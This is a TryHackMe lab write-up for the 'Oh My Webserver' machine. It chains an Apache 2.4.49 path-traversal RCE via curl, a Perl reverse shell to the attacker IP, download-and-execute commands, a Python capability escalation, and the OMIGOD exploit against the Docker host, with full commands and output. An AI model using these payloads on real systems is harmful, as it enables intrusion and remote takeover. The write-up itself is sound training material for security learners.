# TryHackMe : Oh My Webserver WriteUp This is my writeup for the [Oh My Webserver](https://tryhackme.com/room/ohmyweb) room/machine of the [TryHackMe.com platform](https://tryhackme.com). Remember this is just how I solved/owned the machine, maybe there are different and fast paths but... ## Machine *Can you root me?* The machine is rated as a medium machine and if you're looking for a good machine...go for it. Thanks a lot to [tinyb0y](https://tryhackme.com/p/tinyb0y) for this machine! Thanks a lot also to the great [cyberaguiar](https://tryhackme.com/p/cyberaguiar), he helped me to reach the proper vector (after the first unintended way to exploit the machine)! If you want to discuss or if you've any problem just grab me a message on Discord (user kraba#4968). The techiques used in this machine over a small enumeration: * [Apache 2.4.49 CVE-2021-41773](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773) * Linux capabilities on Python * [MS OMI Agent CVE-2021-38647 OMIGOD](https://www.tenable.com/blog/cve-2021-38647-omigod-critical-flaw-leaves-azure-linux-vms-vulnerable-to-remote-code-execution) ## Recon Point 0: my IP for the server was 10.10.10.133, when you read it...just change it with yours First of all I run a classic nmap scan: ```bash nmap -sC -sV -p- 10.10.10.133 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-05 11:51 GMT Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 16.59% done; ETC: 11:53 (0:02:06 remaining) Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 74.53% done; ETC: 11:53 (0:00:30 remaining) Nmap scan report for 10.10.10.133 Host is up (0.032s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA) | 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA) |_ 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519) 80/tcp open http Apache httpd 2.4.49 ((Unix)) | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.49 (Unix) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` I'm looking at a Linux machine with two open ports: 22, 80. When I browse the page 80 I reach just the default apache default home page: ```bash curl http://10.10.10.133

It works!

``` I ran several gobuster, dirb, ffuf, wfuzz...nothing, there is nothing! But wait, I checked the Apache version...it sounds familiar: 2.4.49, oh the [CVE-2021-41773](https://www.itsfoss.net/vulnerability-in-apache-http-server/) ## Foothold You may find other and working exploit but what we need here is just cURL. According to the [mr-exo github page](https://github.com/mr-exo/CVE-2021-41773) I can just run ```bash curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' ``` Let's try it: ```bash curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon) curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami' daemon curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;cat /etc/passwd' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin messagebus:x:101:102::/nonexistent:/usr/sbin/nologin ``` It's working! Let's upload a shell and gain access, I use a perl one, after few checks...it's a docker image and I don't know how many sw are installed: ```bash vi shell.sh perl -e 'use Socket;$i="10.11.55.171";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` and I run 3 cURLs requests: ```bash curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;curl http://10.11.55.171/shell.sh -o /tmp/shell.sh' curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;chmod +x /tmp/shell.sh' curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;sh /tmp/shell.sh' ``` and my netcat listener have a connection: ```bash nc -nvlp 4444 listening on [any] 4444 ... connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 36344 /bin/sh: 0: can't access tty; job control turned off $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $ python3 -c 'import pty; pty.spawn("/bin/bash")' daemon@f1984047b638:/$ ``` ## PE to root on docker I used as usual linpeas.sh (i'm lazy on saturday) and I found a super fast PE to root into the docker image: ```bash Files with capabilities (limited to 50): /usr/bin/python3.7 = cap_setuid+ep ``` As usual on [gtfobins](https://gtfobins.github.io/gtfobins/python/#capabilities) there is a way to use it: ``` python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' # id id uid=0(root) gid=1(daemon) groups=1(daemon) # cd /root cd /root # ls -ltra ls -ltra total 28 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwxr-xr-x 3 root root 4096 Oct 8 05:37 .cache lrwxrwxrwx 1 root root 9 Oct 8 05:43 .bash_history -> /dev/null -rw-r--r-- 1 root root 38 Oct 8 05:47 user.txt drwxr-xr-x 1 root root 4096 Oct 8 08:22 .. -rw------- 1 root daemon 12 Oct 8 08:28 .python_history drwx------ 1 root root 4096 Oct 8 08:28 . # cat user.txt cat user.txt THM{REDACTED} ``` Well! First flag done! ## PE to root After further research, checks, enumeration and so on...nothing was "pretty clear". I'm into a docker image, every possible way to escalate/breakout I know was checked...no way! Thanks to cyberaguiar I found the way. I'm into docker, nothing seems to be running except the port 80: ```bash root@4a70924bafa0:/tmp# netstat -tulpn netstat -tulpn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - ``` and my IP is 172.17.0.2 ```bash root@4a70924bafa0:/tmp# ifconfig eth0: flags=4163 mtu 1500 inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet) RX packets 4861 bytes 6267674 (5.9 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 133875 bytes 9894711 (9.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ``` Why not checking the host IP 172.17.0.1 (the one which run docker)? Nmap is not installed, I grabbed it from [the andrew-d github page](https://github.com/andrew-d/static-binaries) (or better [here](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap)) and I run it: ```bash root@4a70924bafa0:/bin# cd /tmp root@4a70924bafa0:/tmp# curl 10.11.55.171/nmap -o nmap root@4a70924bafa0:/tmp# chmod +x nmap root@4a70924bafa0:/tmp# ./nmap -sT -p- 172.17.0.1 Host is up (0.0044s latency). Not shown: 65531 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5985/tcp closed unknown 5986/tcp open unknown MAC Address: 02:42:19:6E:E8:C1 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 105.07 seconds ``` Ummm interesting! The port 5986 is open and is open only locally (the first nmap was showing only 22 and 80). Let's check what this port is used for on [hacktricks](https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-omi): *OMI is an open-source remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers...* Ah! Good! This machine is "replica" of an Azure Linux server running docker and a service called OMI agent. At the end of the page there are some useful info: [there is a CVE](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647). Other useful links are [this one](https://www.pwndefend.com/2021/09/17/cve-2021-38647-open-management-infrastructure-omi-rce-azure-linux-hosts/ ) and [this one](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/). Let's look for an exploit on github and there are two options, the [horizon3ai one](https://github.com/horizon3ai/CVE-2021-38647) and the [AlteredSecurity one](https://github.com/AlteredSecurity/CVE-2021-38647). The exploit is pretty the same or it's doing the same stuff...I choosed the second one and saved the py into my box. I try to run it: ```bash root@4a70924bafa0:/tmp# curl 10.11.55.171/exploit.py -o exp.py root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "whoami" root ``` And is working. Let's grab the flag and run a reverse shell (the same used at the beginning): ```bash root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "cat /root/root.txt" THM{REDACTED} root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "curl http://10.11.55.171/shell.sh -o /tmp/shell.sh" None root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "chmod +x /tmp/shell.sh" None root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "sh /tmp/shell.sh" ``` and my listener: ```bash nc -nvlp 4444 listening on [any] 4444 ... connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 51410 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) # uname -a Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux # cd /root # ls -ltra total 56 -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc drwxr-xr-x 20 root root 4096 Sep 30 05:05 .. drwx------ 2 root root 4096 Sep 30 05:19 .ssh drwxr-xr-x 3 root root 4096 Sep 30 05:20 snap -rw------- 1 root root 1024 Sep 30 05:53 .rnd -rw-r--r-- 1 root root 277 Oct 8 04:33 .wget-hsts -rw------- 1 root root 12125 Oct 8 05:05 .viminfo -rw-r--r-- 1 root root 38 Oct 8 05:48 root.txt -rw------- 1 root root 169 Oct 8 08:24 .bash_history drwxr-xr-x 3 root root 4096 Feb 23 05:20 .local drwx------ 5 root root 4096 Feb 23 05:20 . # netstat -tulpn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:42245 0.0.0.0:* LISTEN 678/containerd tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1161/docker-proxy tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 624/systemd-resolve tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 751/sshd: /usr/sbin tcp6 0 0 :::80 :::* LISTEN 1173/docker-proxy tcp6 0 0 :::22 :::* LISTEN 751/sshd: /usr/sbin tcp6 0 0 :::5986 :::* LISTEN 941/omiengine udp 0 0 127.0.0.53:53 0.0.0.0:* 624/systemd-resolve udp 0 0 10.10.191.31:68 0.0.0.0:* 621/systemd-network ``` Machine done!